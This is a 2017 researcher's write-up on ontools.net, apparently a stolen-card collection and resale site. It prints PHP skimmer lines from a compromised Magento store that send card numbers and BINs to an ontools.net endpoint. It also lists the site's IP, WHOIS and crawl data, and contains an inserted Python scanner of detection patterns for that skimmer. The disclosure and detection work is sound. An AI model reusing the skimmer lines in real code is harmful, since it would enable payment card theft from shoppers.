ontools.net research

06-06-2017


In June of 2017, while researching a compromised website, I came across ontools.net in a snippet of bad code. After doing some investigative work, I discovered that the website is used to automatically and manually collect credit card numbers, and is then used as a resale market where someone can purchase the card numbers using Bitcoin and Perfect Money.

I signed up for the site and began to explore a bit. It appears to be well developed but incomplete; many of the features listed simply don't work or are missing. I didn't attempt to purchase any cards because, you know, felonies, so I can't confirm that it's actually working, but they do have a pretty extensive list of cards available in their store.

Below I've included their code snippet, a few things I discovered on their site, and screenshots of the app.

Code Snippets
$update = "http://magento.ontools.net/update";
$binCC = substr($data['cc_number'], 0, 6);
$subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$_SERVER['SERVER_NAME']." ".$a->geoplugin_countryName;
$xupdate = "data=".$datasend."&subject=".$subject."&server=".$_SERVER['SERVER_NAME'];
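
A detection sketch for the snippet above, added here as an example and not part of the original write-up: it scans PHP files under a web root for the four traits visible in those lines (the ontools.net host, the six-digit BIN extraction from `cc_number`, the "Verify Mag" subject, and the `data=...&subject=` POST body). The rule names, function names and file-extension list are assumptions of this example.

```python
import os
import re

# Indicators lifted from the snippet on this page. Rule names are invented here.
RULES = {
    "ontools_host": re.compile(r"ontools\.net", re.I),
    "bin_extract": re.compile(r"substr\(\s*\$\w+\[['\"]cc_number['\"]\]\s*,\s*0\s*,\s*6\s*\)"),
    "verify_mag_subject": re.compile(r"Verify Mag"),
    "exfil_body": re.compile(r"[\"']data=[\"']\s*\.\s*\$\w+\s*\.\s*[\"']&subject="),
}

def scan_text(text):
    """Return the sorted names of every rule that matches the given source text."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk root and return {path: [rule names]} for files with at least one hit."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = scan_text(fh.read())
            except OSError:
                continue  # unreadable file: skip it rather than abort the sweep
            if found:
                hits[path] = found
    return hits

# The three lines quoted on this page, used as the positive sample.
SAMPLE_BAD = r"""
$update = "http://magento.ontools.net/update";
$binCC = substr($data['cc_number'], 0, 6);
$subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$_SERVER['SERVER_NAME']." ".$a->geoplugin_countryName;
$xupdate = "data=".$datasend."&subject=".$subject."&server=".$_SERVER['SERVER_NAME'];
"""
# Constructed benign sample: takes the last four digits, not the BIN.
SAMPLE_CLEAN = "<?php $last4 = substr($data['cc_number'], -4); echo $last4;"

if __name__ == "__main__":
    import sys
    for path, rules in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, ",".join(rules))
```

A `bin_extract` hit on its own can come from a legitimate payment module, so treat single-rule matches as leads and files matching several rules as the priority for review.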
Notable data
IP: 188.241.58.16
Host: thcservers.com
Cpanel: http://ontools.net:2082
WHOIS data
Domain Name: ONTOOLS.NET
Registry Domain ID: 1990106061_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2016-01-08T15:55:13.00Z
Creation Date: 2015-12-28T15:53:37.00Z
Registrar Registration Expiration Date: 2018-12-28T15:53:37.00Z
Registrant Name: WHOIS AGENT
Registrant Organization: WHOIS PRIVACY PROTECTION SERVICE, INC
Crawl Data
/
/member.php
/register.php
/resetpass.php
/icq:699623489
/assets
/assets/css
/assets/css/main-style.css
/assets/css/style.css
/assets/css/styles.css
/assets/js
/assets/js/cekpass.js
/assets/js/jquery-1.3.2.min.js
/assets/js/jquery.backgroundPosition.js
/assets/js/marquee.js
/assets/img
/assets/img/background.gif
/assets/img/foreground.png
/assets/img/logo.png
/assets/img/midground.png
/assets/img/user.jpg
/assets/plugins
/assets/plugins/bootstrap/
/assets/plugins/dataTables/
/assets/plugins/flot/
/assets/plugins/jquery-1.10.2.js
/assets/plugins/metisMenu/
/assets/plugins/morris/
/assets/plugins/pace/
/assets/plugins/social-buttons/
/assets/plugins/timeline/
/assets/scripts
/assets/scripts/dashboard-demo.js
/assets/scripts/flot-demo.js
/assets/scripts/morris-demo.js
/assets/scripts/siminta.js
/assets/font-awesome
/assets/font-awesome/css/
/assets/font-awesome/fonts/
Screen Shots

© 2019 Dixon Ryder All Rights Reserved.